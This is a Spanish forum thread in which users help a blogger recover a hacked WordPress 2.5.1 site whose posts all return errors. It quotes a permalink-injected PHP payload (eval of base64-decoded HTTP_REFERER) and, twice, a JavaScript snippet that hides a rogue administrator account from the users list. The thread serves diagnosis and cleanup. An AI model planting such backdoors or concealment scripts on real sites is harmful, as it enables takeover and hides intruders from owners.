Error al entrar en los posts de mi blog - Necesito ayuda urgente

__Cc__ Seguir

Iota
Verificación en dos pasos activada
Desde
22 Jul 2009
Hola!

Veréis sin haber tocado nada de nuestro blog me encontrado esta mañana,que cada vez que intento entrar a un post,sea el que sea,me sale un error!

Podéis comprobarlo entrando al blog de mi firma.

¿alguien sabe cómo debo solucionarlo?

Gracias

Diegotrap

Delta
Redactor
Desde
8 Jul 2009
Tienes razón, a mi me da el mismo error. Yo creo que una posible solucion seria reinstalar Wordpress...

silvestre

1
Dseda
Programador
Verificado por Whatsapp
Suscripción a IA
Desde
18 Ago 2009
Revisa los Permalinks y los restauras a ver que pasa ...

Dracken

Gamma
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
27 Ago 2009
Es por el permalinks, algo a pasado pero no esta bien configurado

ppalayo

Gamma
Verificado por Whatsapp
Desde
23 Jun 2009
Depues del link original aparece %&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
Al parecer es un problema que tienen versiones anteriores de Wordpress, tienes WordPress 2.5.1. Es por ello que es preferible tener actualizado Wordpress a la última versión. Eso lo solucionas en permalinks de tu panel de administración y vuelves al permalink original. Luego actualiza tu blog.
Al parecer fue un ataque de un lammer que se cree hacker.

calero

Préstamo
Gamma
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
1 Sep 2009
Además de los permalinks revisa el .htaccess a ver si ves algo raro.

Un saludo!

vicarlone

1
Sigma
Redactor
¡Excelente comerciante!
Suscripción a IA
Desde
6 Abr 2009
Se trata de un error de permalinks, al menos eso es lo que parece.

Modificaste la estructura de los mismos ultimamente?

__Cc__

Iota
Desde
22 Jul 2009
SOLUCIONADO amigos!!!

La estructura permalink estaba modificada...

MUCHAS GRACIAS POR SU AYUDA!

edito:

Me acabo de dar cuenta que además de mi persona hay optra persopna como administrador,que seguro es quien cambió la estructura del permalink.

Cuando doy a ver los administradores esta persona no aparece,per sin embargo,el sistema sí me cuenta como que además de mi persona hay otra.

¿qué puedo hacer?

PELIGRO...

Última edición:

ppalayo

Gamma
Verificado por Whatsapp
Desde
23 Jun 2009
Según entiendo en el soporte de Wordpress tienes que borrar un script:

<div id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags.innerHTML; var h=tags; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr.className=="subsubsub"){ var n=/>Administrator ((d+))</gi.exec(arr.innerHTML); if(n[1]>0){ var txt=arr.innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<"); arr.innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>

Talvez está en tu tema, revisa todo. Luego pon a todos los usuarios como subscriptores menos tu usuario por supuesto.
Al parecer fue un ataque con un bot o algo así.
Si necesitas mas ayuda me envias un PM.

__Cc__

Iota
Desde
22 Jul 2009
Según entiendo en el soporte de Wordpress tienes que borrar un script:

<div id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags.innerHTML; var h=tags; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr.className=="subsubsub"){ var n=/>Administrator ((d+))</gi.exec(arr.innerHTML); if(n[1]>0){ var txt=arr.innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<"); arr.innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>

Talvez está en tu tema, revisa todo. Luego pon a todos los usuarios como subscriptores menos tu usuario por supuesto.
Al parecer fue un ataque con un bot o algo así.
Si necesitas mas ayuda me envias un PM.

tienes un mensaje privado!

muchas gracias!

Solucionado gracias a la paciencia por msn de ppalayo!

Gracias a tod@s tb!

ppalayo

Gamma
Verificado por Whatsapp
Desde
23 Jun 2009
Creo que ya esta solucionado el problema, si tiene el mismo problema escribí un artículo sobre ello y Enlace eliminado.